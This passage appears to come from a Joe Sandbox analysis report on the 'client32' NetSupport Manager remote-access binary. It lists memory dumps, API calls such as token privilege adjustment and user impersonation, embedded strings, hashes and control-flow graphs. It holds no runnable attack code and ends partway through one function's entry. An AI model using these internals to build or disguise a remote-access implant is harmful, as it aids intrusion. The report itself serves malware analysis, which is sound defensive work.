                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdjustChangeCloseFindNotificationPrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 1022747518-0
                                                                              • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                              • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                              Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                              • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                              • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                              • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                              • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                              • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                              • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                              • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                              • DispatchMessageA.USER32(?), ref: 11030136
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                              • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                              • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                              • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                              • SetWindowPos.USER32(00040270,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                              • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,AB86ACF8,?,?,00000000), ref: 1112909A
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                              • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$562258$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                              • API String ID: 372548862-1112890062
                                                                              • Opcode ID: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                              • Opcode Fuzzy Hash: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                              Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1048 1102e0d0-1102e120 call 111101b0 1051 1102e122-1102e136 call 11143630 1048->1051 1052 1102e138 1048->1052 1054 1102e13e-1102e183 call 11142e60 call 11143690 1051->1054 1052->1054 1060 1102e323-1102e332 call 11145990 1054->1060 1061 1102e189 1054->1061 1067 1102e338-1102e348 1060->1067 1063 1102e190-1102e193 1061->1063 1065 1102e195-1102e197 1063->1065 1066 1102e1b8-1102e1c1 1063->1066 1068 1102e1a0-1102e1b1 1065->1068 1069 1102e1c7-1102e1ce 1066->1069 1070 1102e2f4-1102e30d call 11143690 1066->1070 1071 1102e34a 1067->1071 1072 1102e34f-1102e363 call 1102d360 1067->1072 1068->1068 1082 1102e1b3 1068->1082 1069->1070 1073 1102e2c3-1102e2d8 call 11163ca7 1069->1073 1074 1102e1d5-1102e1d7 1069->1074 1075 1102e2da-1102e2ef call 11163ca7 1069->1075 1076 1102e26a-1102e29d call 11162777 call 11142e60 1069->1076 1077 1102e2ab-1102e2c1 _strncpy 1069->1077 1078 1102e25b-1102e265 1069->1078 1079 1102e29f-1102e2a9 1069->1079 1080 1102e21c-1102e222 1069->1080 1081 1102e24c-1102e256 1069->1081 1070->1063 1098 1102e313-1102e315 1070->1098 1071->1072 1095 1102e368-1102e36d 1072->1095 1073->1070 1074->1070 1089 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1074->1089 1075->1070 1076->1070 1077->1070 1078->1070 1079->1070 1090 1102e224-1102e238 call 11163ca7 1080->1090 1091 1102e23d-1102e247 1080->1091 1081->1070 1082->1070 1089->1070 1090->1070 1091->1070 1101 1102e413-1102e42d call 11146fe0 1095->1101 1103 1102e373-1102e398 call 110b7df0 call 11147060 1095->1103 1098->1101 1102 1102e31b-1102e321 1098->1102 1112 1102e483-1102e48f call 1102bc40 1101->1112 1113 1102e42f-1102e448 call 1105e820 1101->1113 1102->1060 1102->1067 1123 1102e3a3-1102e3a9 1103->1123 1124 1102e39a-1102e3a1 1103->1124 1125 1102e491-1102e498 1112->1125 1126 1102e468-1102e46f 1112->1126 1113->1112 1127 1102e44a-1102e45c 1113->1127 1128 1102e3ab-1102e3b2 call 11028360 1123->1128 1129 1102e409 1123->1129 1124->1101 1130 1102e475-1102e478 1125->1130 1131 1102e49a-1102e4a4 1125->1131 1126->1130 1133 1102e67a-1102e69b GetComputerNameA 1126->1133 1127->1112 1143 1102e45e 1127->1143 1128->1129 1144 1102e3b4-1102e3e6 1128->1144 1129->1101 1136 1102e47a-1102e481 call 110b7df0 1130->1136 1137 1102e4a9 1130->1137 1131->1133 1138 1102e6d3-1102e6d9 1133->1138 1139 1102e69d-1102e6d1 call 11028230 1133->1139 1142 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1136->1142 1137->1142 1140 1102e6db-1102e6e0 1138->1140 1141 1102e70f-1102e722 _strncpy 1138->1141 1139->1138 1165 1102e727-1102e733 1139->1165 1149 1102e6e6-1102e6ea 1140->1149 1150 1102e917-1102e93a 1141->1150 1200 1102e64a-1102e652 SetLastError 1142->1200 1201 1102e58c-1102e5a3 1142->1201 1143->1126 1156 1102e3f0-1102e3ff call 110f64d0 1144->1156 1157 1102e3e8-1102e3ee 1144->1157 1152 1102e706-1102e708 1149->1152 1153 1102e6ec-1102e6ee 1149->1153 1169 1102e962-1102e96a 1150->1169 1170 1102e93c-1102e942 1150->1170 1160 1102e70b-1102e70d 1152->1160 1161 1102e702-1102e704 1153->1161 1162 1102e6f0-1102e6f6 1153->1162 1167 1102e402-1102e404 call 1102d900 1156->1167 1157->1156 1157->1167 1160->1141 1160->1165 1161->1160 1162->1152 1166 1102e6f8-1102e700 1162->1166 1176 1102e735-1102e74a call 110b7df0 call 1102a1f0 1165->1176 1177 1102e74c-1102e75f call 11081d30 1165->1177 1166->1149 1166->1161 1167->1129 1171 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1169->1171 1172 1102e96c-1102e979 call 11036710 call 11162777 1169->1172 1170->1169 1178 1102e944-1102e95d call 1102d900 1170->1178 1172->1171 1204 1102e7a3-1102e7bc call 11081d30 1176->1204 1195 1102e761-1102e784 1177->1195 1196 1102e786-1102e788 1177->1196 1178->1169 1195->1204 1197 1102e790-1102e7a1 1196->1197 1197->1197 1197->1204 1203 1102e613-1102e61f 1200->1203 1201->1203 1216 1102e5a5-1102e5ae 1201->1216 1207 1102e662-1102e671 1203->1207 1208 1102e621-1102e62d 1203->1208 1218 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1204->1218 1219 1102e8fc-1102e909 _strncpy 1204->1219 1207->1133 1217 1102e673-1102e674 FreeLibrary 1207->1217 1213 1102e63f-1102e643 1208->1213 1214 1102e62f-1102e63d GetProcAddress 1208->1214 1220 1102e654-1102e656 SetLastError 1213->1220 1221 1102e645-1102e648 1213->1221 1214->1213 1216->1203 1223 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1216->1223 1217->1133 1254 1102e853-1102e869 call 11129e00 1218->1254 1255 1102e83f-1102e84e call 11029a70 1218->1255 1227 1102e90c-1102e911 CharUpperA 1219->1227 1224 1102e65c 1220->1224 1221->1224 1223->1203 1241 1102e5e8-1102e60e call 11147060 call 11027f80 1223->1241 1224->1207 1227->1150 1241->1203 1259 1102e882-1102e8bc call 110d0e20 * 2 1254->1259 1260 1102e86b-1102e87d call 110d0e20 1254->1260 1255->1254 1267 1102e8d2-1102e8fa _strncpy call 110d0a10 1259->1267 1268 1102e8be-1102e8cd call 11029a70 1259->1268 1260->1259 1267->1227 1268->1267
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memsetwsprintf
                                                                              • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 3802068140-1818846399
                                                                              • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                              • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                              Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1690 11144140-11144181 GetModuleFileNameA 1691 111441c3 1690->1691 1692 11144183-11144196 call 11081e00 1690->1692 1693 111441c9-111441cd 1691->1693 1692->1691 1701 11144198-111441c1 LoadLibraryA 1692->1701 1695 111441cf-111441dc LoadLibraryA 1693->1695 1696 111441e9-11144207 GetModuleHandleA GetProcAddress 1693->1696 1695->1696 1698 111441de-111441e6 LoadLibraryA 1695->1698 1699 11144217-11144240 GetProcAddress * 4 1696->1699 1700 11144209-11144215 1696->1700 1698->1696 1702 11144243-111442bb GetProcAddress * 10 call 11162bb7 1699->1702 1700->1702 1701->1693 1704 111442c0-111442c3 1702->1704
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11144173
                                                                              • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                              • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                              • API String ID: 3874234733-2061581830
                                                                              • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                              • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                              Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1705 110aa170-110aa1d2 LoadLibraryA GetProcAddress 1706 110aa1d8-110aa1e9 SetupDiGetClassDevsA 1705->1706 1707 110aa2e5-110aa2ed SetLastError 1705->1707 1708 110aa1ef-110aa1fd 1706->1708 1709 110aa3f3-110aa3f5 1706->1709 1712 110aa2f9-110aa2fb SetLastError 1707->1712 1713 110aa200-110aa204 1708->1713 1710 110aa3fe-110aa400 1709->1710 1711 110aa3f7-110aa3f8 FreeLibrary 1709->1711 1714 110aa417-110aa432 call 11162bb7 1710->1714 1711->1710 1715 110aa301-110aa30c GetLastError 1712->1715 1716 110aa21d-110aa235 1713->1716 1717 110aa206-110aa217 GetProcAddress 1713->1717 1718 110aa312-110aa31d call 11163aa5 1715->1718 1719 110aa3a0-110aa3b1 GetProcAddress 1715->1719 1716->1715 1728 110aa23b-110aa23d 1716->1728 1717->1712 1717->1716 1718->1713 1722 110aa3bb-110aa3bd SetLastError 1719->1722 1723 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 1719->1723 1727 110aa3c3-110aa3c5 1722->1727 1723->1727 1727->1709 1729 110aa3c7-110aa3e9 CreateFileA 1727->1729 1730 110aa248-110aa24a 1728->1730 1731 110aa23f-110aa245 call 11163aa5 1728->1731 1734 110aa3eb-110aa3f0 call 11163aa5 1729->1734 1735 110aa402-110aa40c call 11163aa5 1729->1735 1732 110aa24c-110aa25f GetProcAddress 1730->1732 1733 110aa265-110aa27b 1730->1733 1731->1730 1732->1733 1738 110aa322-110aa32a SetLastError 1732->1738 1743 110aa27d-110aa286 GetLastError 1733->1743 1745 110aa28c-110aa29f call 11163a11 1733->1745 1734->1709 1746 110aa40e-110aa40f FreeLibrary 1735->1746 1747 110aa415 1735->1747 1738->1743 1743->1745 1748 110aa361-110aa372 call 110aa110 1743->1748 1755 110aa382-110aa393 call 110aa110 1745->1755 1756 110aa2a5-110aa2ad 1745->1756 1746->1747 1747->1714 1753 110aa37b-110aa37d 1748->1753 1754 110aa374-110aa375 FreeLibrary 1748->1754 1753->1714 1754->1753 1755->1753 1762 110aa395-110aa39e FreeLibrary 1755->1762 1758 110aa2af-110aa2c2 GetProcAddress 1756->1758 1759 110aa2c4-110aa2db 1756->1759 1758->1759 1761 110aa32f-110aa331 SetLastError 1758->1761 1763 110aa337-110aa351 call 110aa110 call 11163aa5 1759->1763 1766 110aa2dd-110aa2e0 1759->1766 1761->1763 1762->1714 1763->1753 1770 110aa353-110aa35c FreeLibrary 1763->1770 1766->1713 1770->1714
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(setupapi.dll,AB86ACF8,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                              • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
